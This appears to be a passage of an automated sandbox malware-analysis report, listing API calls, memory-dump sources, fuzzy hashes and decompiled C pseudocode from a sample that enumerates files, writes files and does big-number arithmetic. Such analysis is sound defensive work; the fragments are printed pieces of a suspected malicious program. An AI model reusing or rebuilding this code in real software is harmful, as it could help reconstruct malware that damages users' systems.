                                                            0x00dd2dfc
                                                            0x00dd2dff
                                                            0x00dd2e08
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2e08
                                                            0x00dd2d5c
                                                            0x00dd2d56
                                                            0x00dd2d3e
                                                            0x00dd2e0e
                                                            0x00dd2e0e
                                                            0x00dd2e14
                                                            0x00dd2e14
                                                            0x00dd2e1a
                                                            0x00dd2e1a
                                                            0x00dd2e23
                                                            0x00dd2e29
                                                            0x00dd2e29
                                                            0x00dd2ce5
                                                            0x00dd2e32

                                                            APIs
                                                            • SysAllocString.OLEAUT32(00DD92B0), ref: 00DD2CF0
                                                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00DD2DD2
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD2DEB
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD2E1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: String$Free$Alloclstrcmp
                                                            • String ID:
                                                            • API String ID: 1885612795-0
                                                            • Opcode ID: fb6be0a07e70bd6b00c2dca8f70e8fa830cc04d61a6b1267123ab07c58596398
                                                            • Instruction ID: 9461886dd8d0591167d830d48ef5de92d36f472e7dfd294aee6cb61cd1074462
                                                            • Opcode Fuzzy Hash: fb6be0a07e70bd6b00c2dca8f70e8fa830cc04d61a6b1267123ab07c58596398
                                                            • Instruction Fuzzy Hash: AB511D75D00619EFCB01DFA8C9888AEF7BAEF89704B148596E915EB314D7729D01CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00DD2160
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD2243
                                                              • Part of subcall function 00DD2CA0: SysAllocString.OLEAUT32(00DD92B0), ref: 00DD2CF0
                                                            • SafeArrayDestroy.OLEAUT32(?), ref: 00DD2297
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD22A5
                                                              • Part of subcall function 00DD2B38: Sleep.KERNEL32(000001F4), ref: 00DD2B80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                            • String ID:
                                                            • API String ID: 3193056040-0
                                                            • Opcode ID: d06b5a955d03801c4c09bfcbe86947a9c05061c0f0465b54a8238592b7085d0f
                                                            • Instruction ID: 758e4615662233556163d086132d596488f7fbcc6be3527507488c7af2ee724f
                                                            • Opcode Fuzzy Hash: d06b5a955d03801c4c09bfcbe86947a9c05061c0f0465b54a8238592b7085d0f
                                                            • Instruction Fuzzy Hash: 8C51027590020AEFCB00DFE8C8848AEBBB6FF98340B15886AF555EB320D7719D45CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04574DA8
                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04574DBE
                                                            • memset.NTDLL ref: 04574E67
                                                            • memset.NTDLL ref: 04574E7D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$_allmul_aulldiv
                                                            • String ID:
                                                            • API String ID: 3041852380-0
                                                            • Opcode ID: 49fb98586aa0344c97cbc06a79abe09e5f593a607d3f5c6e34c564a090dc6c51
                                                            • Instruction ID: 2ad4a0588bc0b671d537d972ecffa40bcf77032a79ece3f95922af3cdad0b858
                                                            • Opcode Fuzzy Hash: 49fb98586aa0344c97cbc06a79abe09e5f593a607d3f5c6e34c564a090dc6c51
                                                            • Instruction Fuzzy Hash: 3A41A57160021ABFEB109E68EC44BEE7775FF86324F004579F955A7180EB70BE449B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E00DD67C4(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				signed int _v16;
                                                            				void _v156;
                                                            				void _v428;
                                                            				void* _t55;
                                                            				unsigned int _t56;
                                                            				signed int _t66;
                                                            				signed int _t74;
                                                            				void* _t76;
                                                            				signed int _t79;
                                                            				void* _t81;
                                                            				void* _t92;
                                                            				void* _t96;
                                                            				signed int* _t99;
                                                            				signed int _t101;
                                                            				signed int _t103;
                                                            				void* _t107;
                                                            
                                                            				_t92 = _a12;
                                                            				_t101 = __eax;
                                                            				_t55 = E00DD4E19(_a16, _t92);
                                                            				_t79 = _t55;
                                                            				if(_t79 == 0) {
                                                            					L18:
                                                            					return _t55;
                                                            				}
                                                            				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                            				_t81 = 0;
                                                            				_t96 = 0x20;
                                                            				if(_t56 == 0) {
                                                            					L4:
                                                            					_t97 = _t96 - _t81;
                                                            					_v12 = _t96 - _t81;
                                                            					E00DD430F(_t79,  &_v428);
                                                            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00DD6C82(_t101,  &_v428, _a8, _t96 - _t81);
                                                            					E00DD6C82(_t79,  &_v156, _a12, _t97);
                                                            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                            					_t66 = E00DD430F(_t101, 0xdda188);
                                                            					_t103 = _t101 - _t79;
                                                            					_a8 = _t103;
                                                            					if(_t103 < 0) {
                                                            						L17:
                                                            						E00DD430F(_a16, _a4);
                                                            						E00DD24AE(_t79,  &_v428, _a4, _t97);
                                                            						memset( &_v428, 0, 0x10c);
                                                            						_t55 = memset( &_v156, 0, 0x84);
                                                            						goto L18;
                                                            					}
                                                            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                            					do {
                                                            						if(_v8 != 0xffffffff) {
                                                            							_push(1);
                                                            							_push(0);
                                                            							_push(0);
                                                            							_push( *_t99);
                                                            							L00DD7DDC();
                                                            							_t74 = _t66 +  *(_t99 - 4);
                                                            							asm("adc edx, esi");
                                                            							_push(0);
                                                            							_push(_v8 + 1);
                                                            							_push(_t92);
                                                            							_push(_t74);
                                                            							L00DD7DD6();
                                                            							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                            								_t74 = _t74 | 0xffffffff;
                                                            								_v16 = _v16 & 0x00000000;
                                                            							}
                                                            						} else {
                                                            							_t74 =  *_t99;
                                                            						}
                                                            						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                            						_a12 = _t74;
                                                            						_t76 = E00DD3BCC(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                            						while(1) {
                                                            							 *_t99 =  *_t99 - _t76;
                                                            							if( *_t99 != 0) {
                                                            								goto L14;
                                                            							}
                                                            							L13:
                                                            							_t92 =  &_v156;
                                                            							if(E00DD4858(_t79, _t92, _t106) < 0) {
                                                            								break;
                                                            							}
                                                            							L14:
                                                            							_a12 = _a12 + 1;
                                                            							_t76 = E00DD319B(_t79,  &_v156, _t106, _t106);
                                                            							 *_t99 =  *_t99 - _t76;
                                                            							if( *_t99 != 0) {
                                                            								goto L14;
                                                            							}
                                                            							goto L13;
                                                            						}
                                                            						_a8 = _a8 - 1;
                                                            						_t66 = _a12;
                                                            						_t99 = _t99 - 4;
                                                            						 *(0xdda188 + _a8 * 4) = _t66;
                                                            					} while (_a8 >= 0);
                                                            					_t97 = _v12;
                                                            					goto L17;
                                                            				}
                                                            				while(_t81 < _t96) {
                                                            					_t81 = _t81 + 1;
                                                            					_t56 = _t56 >> 1;
                                                            					if(_t56 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L4;
                                                            				}
                                                            				goto L4;
                                                            			}
                                                            0x00dd67c7
                                                            0x00dd67d3
                                                            0x00dd67d9
                                                            0x00dd67de
                                                            0x00dd67e2
                                                            0x00dd6954
                                                            0x00dd6958
                                                            0x00dd6958
                                                            0x00dd67e8
                                                            0x00dd67ec
                                                            0x00dd67f2
                                                            0x00dd67f3
                                                            0x00dd67fe
                                                            0x00dd6804
                                                            0x00dd6809
                                                            0x00dd680c
                                                            0x00dd6826
                                                            0x00dd6835
                                                            0x00dd6841
                                                            0x00dd684b
                                                            0x00dd6850
                                                            0x00dd6852
                                                            0x00dd6855
                                                            0x00dd690c
                                                            0x00dd6912
                                                            0x00dd6923
                                                            0x00dd6936
                                                            0x00dd694c
                                                            0x00000000
                                                            0x00dd6951
                                                            0x00dd685e
                                                            0x00dd6865
                                                            0x00dd6869
                                                            0x00dd686f
                                                            0x00dd6871
                                                            0x00dd6873
                                                            0x00dd6875
                                                            0x00dd6877
                                                            0x00dd6881
                                                            0x00dd6886
                                                            0x00dd6888
                                                            0x00dd688a
                                                            0x00dd688b
                                                            0x00dd688c
                                                            0x00dd688d
                                                            0x00dd6894
                                                            0x00dd689b
                                                            0x00dd689e
                                                            0x00dd689e
                                                            0x00dd686b
                                                            0x00dd686b
                                                            0x00dd686b
                                                            0x00dd68a6
                                                            0x00dd68ae
                                                            0x00dd68ba
                                                            0x00dd68bf
                                                            0x00dd68bf
                                                            0x00dd68c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd68c6
                                                            0x00dd68c9
                                                            0x00dd68d6
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd68d8
                                                            0x00dd68d8
                                                            0x00dd68e5
                                                            0x00dd68bf
                                                            0x00dd68c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd68c4
                                                            0x00dd68ef
                                                            0x00dd68f2
                                                            0x00dd68f5
                                                            0x00dd68fc
                                                            0x00dd68fc
                                                            0x00dd6909
                                                            0x00000000
                                                            0x00dd6909
                                                            0x00dd67f5
                                                            0x00dd67f9
                                                            0x00dd67fa
                                                            0x00dd67fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd67fc
                                                            0x00000000

                                                            APIs
                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00DD6877
                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00DD688D
                                                            • memset.NTDLL ref: 00DD6936
                                                            • memset.NTDLL ref: 00DD694C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: memset$_allmul_aulldiv
                                                            • String ID:
                                                            • API String ID: 3041852380-0
                                                            • Opcode ID: 1cf9a44f377ccb3aedae05fe1a8205cb9935eba53fc0179e422d17bcc31ea48c
                                                            • Instruction ID: 4224913d39d83809a90e17cf256a9d923e095f04e0d3a0c561f26f6bc1bf0fe4
                                                            • Opcode Fuzzy Hash: 1cf9a44f377ccb3aedae05fe1a8205cb9935eba53fc0179e422d17bcc31ea48c
                                                            • Instruction Fuzzy Hash: 6C418D31A00219BFDB20DF68CC41BEE7765EF45310F10416AB959A7381DB70EE558BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCommandLineA.KERNEL32(?,00000000,00000000,?,00000000,0457227C,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456ED76
                                                            • StrChrA.SHLWAPI(00000000,00000020,?,00000000,0457227C,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456ED87
                                                              • Part of subcall function 0457BAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04574A41,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 0457BAED
                                                              • Part of subcall function 0457BAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457BB10
                                                              • Part of subcall function 0457BAE4: memset.NTDLL ref: 0457BB1F
                                                            • ExitProcess.KERNEL32 ref: 0456EED5
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,7656D3B0,049BB17C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B5D
                                                              • Part of subcall function 04580B38: StrTrimA.SHLWAPI(00000000,0458847C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B7C
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B88
                                                            • lstrcmp.KERNEL32(00000000,?), ref: 0456EDF3
                                                              • Part of subcall function 0457CC4A: FindFirstFileW.KERNEL32(?,?,?,?), ref: 0457CCD6
                                                              • Part of subcall function 0457CC4A: lstrlenW.KERNEL32(?), ref: 0457CCF2
                                                              • Part of subcall function 0457CC4A: lstrlenW.KERNEL32(?), ref: 0457CD0A
                                                              • Part of subcall function 0457CC4A: lstrcpyW.KERNEL32(00000000,?), ref: 0457CD23
                                                              • Part of subcall function 0457CC4A: lstrcpyW.KERNEL32(00000002), ref: 0457CD38
                                                              • Part of subcall function 0457CC4A: FindNextFileW.KERNEL32(?,00000010), ref: 0457CD60
                                                              • Part of subcall function 0457CC4A: FindClose.KERNEL32(00000002), ref: 0457CD6E
                                                              • Part of subcall function 0457CC4A: FreeLibrary.KERNEL32(?), ref: 0457CD80
                                                              • Part of subcall function 04579976: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04579999
                                                              • Part of subcall function 04579976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,0456EE33,?,?,00000000,0457227C,00000000,73BCF5B0,0456824E), ref: 045799DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Findlstrlen$FileFreeHeaplstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmpmemcpymemset
                                                            • String ID:
                                                            • API String ID: 2123058440-0
                                                            • Opcode ID: 9f93b3f5d88008d272ac1512a25c420803dbdee23c6bc7b3b056998ad9668d82
                                                            • Instruction ID: 2c5ba552efc7a4c12331eed7d9669bc10f7ae70f8ec4edfbeb094fec33ef7982
                                                            • Opcode Fuzzy Hash: 9f93b3f5d88008d272ac1512a25c420803dbdee23c6bc7b3b056998ad9668d82
                                                            • Instruction Fuzzy Hash: 77417B75604202EFE710EF75E88592BB7E9FB84618F00483DF556E3150EE35ED09AB12
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04575CE8: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0456908A), ref: 04575CF4
                                                              • Part of subcall function 04575CE8: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04575D52
                                                              • Part of subcall function 04575CE8: lstrcpy.KERNEL32(00000000,00000000), ref: 04575D62
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 04578002
                                                            • wsprintfA.USER32 ref: 04578032
                                                            • GetLastError.KERNEL32 ref: 045780A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                                                            • String ID: `
                                                            • API String ID: 324226357-1850852036
                                                            • Opcode ID: b3df6f88ee0152b0a1320f16cf7c1a10ddacc4d7cebf4488b89575b9b22c45d7
                                                            • Instruction ID: 6c59cef78a1534cc17ed503cf460035c710f8155c0bd3aa714dec82118dcc787
                                                            • Opcode Fuzzy Hash: b3df6f88ee0152b0a1320f16cf7c1a10ddacc4d7cebf4488b89575b9b22c45d7
                                                            • Instruction Fuzzy Hash: B331B37150020AEBDB21AF66EC84A9B3BF8FF54354F104439F916A7250DB75F924AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 0457FAB7
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetLastError.KERNEL32 ref: 0457FA2B
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0457FA3B
                                                            • GetLastError.KERNEL32 ref: 0457FA5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 35602742-0
                                                            • Opcode ID: 1a83bee23c1f5fd75742172519ad2ecd94d48d3bdee43c8e03cd7dadd7cd8a65
                                                            • Instruction ID: 8e9d8287ac96c7e0593c441f112d05493704c267b2c6a3f8cf5e3faee3e9caa8
                                                            • Opcode Fuzzy Hash: 1a83bee23c1f5fd75742172519ad2ecd94d48d3bdee43c8e03cd7dadd7cd8a65
                                                            • Instruction Fuzzy Hash: B84108B2901209EFDF10DFA4E9849AEBBB9FF04345B24447AE401E7150EB35AE44EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045752CD: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 045752DB
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457F7DC
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0457F82B
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                              • Part of subcall function 0457533D: GetLastError.KERNEL32 ref: 04575388
                                                              • Part of subcall function 0457533D: WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                              • Part of subcall function 0457533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                              • Part of subcall function 0457533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                              • Part of subcall function 0457533D: SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                              • Part of subcall function 0457533D: CloseHandle.KERNEL32(00000001), ref: 04575430
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000101,?,?,?,04567236,?,?,?,?,?,00000000), ref: 0457F860
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,04567236,?,?,?,?,?,00000000,?,00000000,?,04564A91), ref: 0457F870
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                            • String ID:
                                                            • API String ID: 4200334623-0
                                                            • Opcode ID: d52e958a48c8a484bd7179ea0d933965e03797a19acb850a85d63bde56204dbd
                                                            • Instruction ID: 61149f055e5bd1fd51f29a28d72f88ebfe8f7b3e58bfd7d30cea6174f16f5215
                                                            • Opcode Fuzzy Hash: d52e958a48c8a484bd7179ea0d933965e03797a19acb850a85d63bde56204dbd
                                                            • Instruction Fuzzy Hash: E631F476900119FFEB109FA5DC88CAEBBBDFB08354B100069F500A7251DB75AE54EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0458148E
                                                            • memcpy.NTDLL(00000018,?,?), ref: 045814B7
                                                            • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00019D73,00000000,000000FF,00000008), ref: 045814F6
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04581509
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                            • String ID:
                                                            • API String ID: 2780211928-0
                                                            • Opcode ID: 5729b7c6296fa3d73070b7e41a733d5b6ba10a9e56fe87dd56bb5730f4edc825
                                                            • Instruction ID: 96d4cd6fbd943cfd2d03a54eede7be9b352d5499fff739eefb6435e23577e44a
                                                            • Opcode Fuzzy Hash: 5729b7c6296fa3d73070b7e41a733d5b6ba10a9e56fe87dd56bb5730f4edc825
                                                            • Instruction Fuzzy Hash: C3313E70200606AFDB219F29EC44E9A7BB9FB09764F00452DF916E6290DB74ED15EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • TlsGetValue.KERNEL32(?), ref: 045630EF
                                                            • SetEvent.KERNEL32(?), ref: 04563139
                                                            • TlsSetValue.KERNEL32(00000001), ref: 04563173
                                                            • TlsSetValue.KERNEL32(00000000), ref: 0456318F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$Event
                                                            • String ID:
                                                            • API String ID: 3803239005-0
                                                            • Opcode ID: 49e785d2e9b1a09cd1f5ca32ab12718979d8f2a2b24d9da322af91226bb2aada
                                                            • Instruction ID: ea974f00a658fec5e3aca8c2f94a33e00e9d2e6dab271d3f45c64ad10247bd95
                                                            • Opcode Fuzzy Hash: 49e785d2e9b1a09cd1f5ca32ab12718979d8f2a2b24d9da322af91226bb2aada
                                                            • Instruction Fuzzy Hash: E8219F71200204EFDB228F18EC88A6A7BA6FB41360B104928F917D72A0D771FC56FF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045833D9: memcpy.NTDLL(00000000,00000110,04575AB0,04575AB0,?,00000000,00000001,00000000,73B74D40), ref: 0458340F
                                                              • Part of subcall function 045833D9: memset.NTDLL ref: 04583485
                                                              • Part of subcall function 045833D9: memset.NTDLL ref: 04583499
                                                            • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 04568ECF
                                                            • lstrcmpi.KERNEL32(00000000,?), ref: 04568EF6
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 04568F3B
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 04568F4C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                            • String ID:
                                                            • API String ID: 1065503980-0
                                                            • Opcode ID: 34e784f014cf1cbd3a44406f5ac522610f25664f98a022cff8d59164f81a42d4
                                                            • Instruction ID: a583165e7dd7abd69b37438ad90f4bbc66ea4ba555c3c2b0f2586efa00ef61dc
                                                            • Opcode Fuzzy Hash: 34e784f014cf1cbd3a44406f5ac522610f25664f98a022cff8d59164f81a42d4
                                                            • Instruction Fuzzy Hash: 30214A71A00206EBDF11AFA5EC84EAD7BB9FB44358F004069F906AB251DA35BD58FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memcpy.NTDLL(00000000,00000110,04575AB0,04575AB0,?,00000000,00000001,00000000,73B74D40), ref: 0458340F
                                                            • memset.NTDLL ref: 04583485
                                                            • memset.NTDLL ref: 04583499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$AllocateHeapmemcpy
                                                            • String ID: {l0u
                                                            • API String ID: 1529149438-597588357
                                                            • Opcode ID: 06dd9415accd1e1e6c5edcb448ec0662c9f9faf239f0d6f9687a7e77b1fe0701
                                                            • Instruction ID: aaa2583979a431d243435951aaaee7ea84800c7fd1c61eef44bad3ff565d8161
                                                            • Opcode Fuzzy Hash: 06dd9415accd1e1e6c5edcb448ec0662c9f9faf239f0d6f9687a7e77b1fe0701
                                                            • Instruction Fuzzy Hash: 2E217175A00119ABEF01AFA9DC44FEE7BB8FF44614F044069FD04E6250EB35AA00DBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00DD4671(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                            				intOrPtr _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				intOrPtr _t26;
                                                            				intOrPtr* _t28;
                                                            				intOrPtr _t31;
                                                            				intOrPtr* _t32;
                                                            				void* _t39;
                                                            				int _t46;
                                                            				intOrPtr* _t47;
                                                            				int _t48;
                                                            
                                                            				_t47 = __eax;
                                                            				_push( &_v12);
                                                            				_push(__eax);
                                                            				_t39 = 0;
                                                            				_t46 = 0;
                                                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                            				_v8 = _t26;
                                                            				if(_t26 < 0) {
                                                            					L13:
                                                            					return _v8;
                                                            				}
                                                            				if(_v12 == 0) {
                                                            					Sleep(0xc8);
                                                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                            				}
                                                            				if(_v8 >= _t39) {
                                                            					_t28 = _v12;
                                                            					if(_t28 != 0) {
                                                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                            						_v8 = _t31;
                                                            						if(_t31 >= 0) {
                                                            							_t46 = lstrlenW(_v16);
                                                            							if(_t46 != 0) {
                                                            								_t46 = _t46 + 1;
                                                            								_t48 = _t46 + _t46;
                                                            								_t39 = E00DD77D7(_t48);
                                                            								if(_t39 == 0) {
                                                            									_v8 = 0x8007000e;
                                                            								} else {
                                                            									memcpy(_t39, _v16, _t48);
                                                            								}
                                                            								__imp__#6(_v16);
                                                            							}
                                                            						}
                                                            						_t32 = _v12;
                                                            						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                            					}
                                                            					 *_a4 = _t39;
                                                            					 *_a8 = _t46 + _t46;
                                                            				}
                                                            				goto L13;
                                                            			}

                                                            APIs
                                                            • Sleep.KERNEL32(000000C8), ref: 00DD469F
                                                            • lstrlenW.KERNEL32(?), ref: 00DD46D5
                                                            • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00DD46F6
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD470A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeSleepStringlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 1198164300-0
                                                            • Opcode ID: c1720247ac78a2fc8854b47a44ace41cec78347d8ef8059cbf334bed914873a4
                                                            • Instruction ID: ab6c8e2f1a72f5cf7053d718c496c7468020a5ffedf7ec6acaf9b8f73ccc8035
                                                            • Opcode Fuzzy Hash: c1720247ac78a2fc8854b47a44ace41cec78347d8ef8059cbf334bed914873a4
                                                            • Instruction Fuzzy Hash: EA212C75901209FFCB10DFA4D884A9EBBB8FF49315B1441AAE945D7310E731AA45CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04568D02
                                                            • lstrlen.KERNEL32(00000000), ref: 04568D12
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • strcpy.NTDLL ref: 04568D29
                                                            • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 04568D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                            • String ID:
                                                            • API String ID: 528014985-0
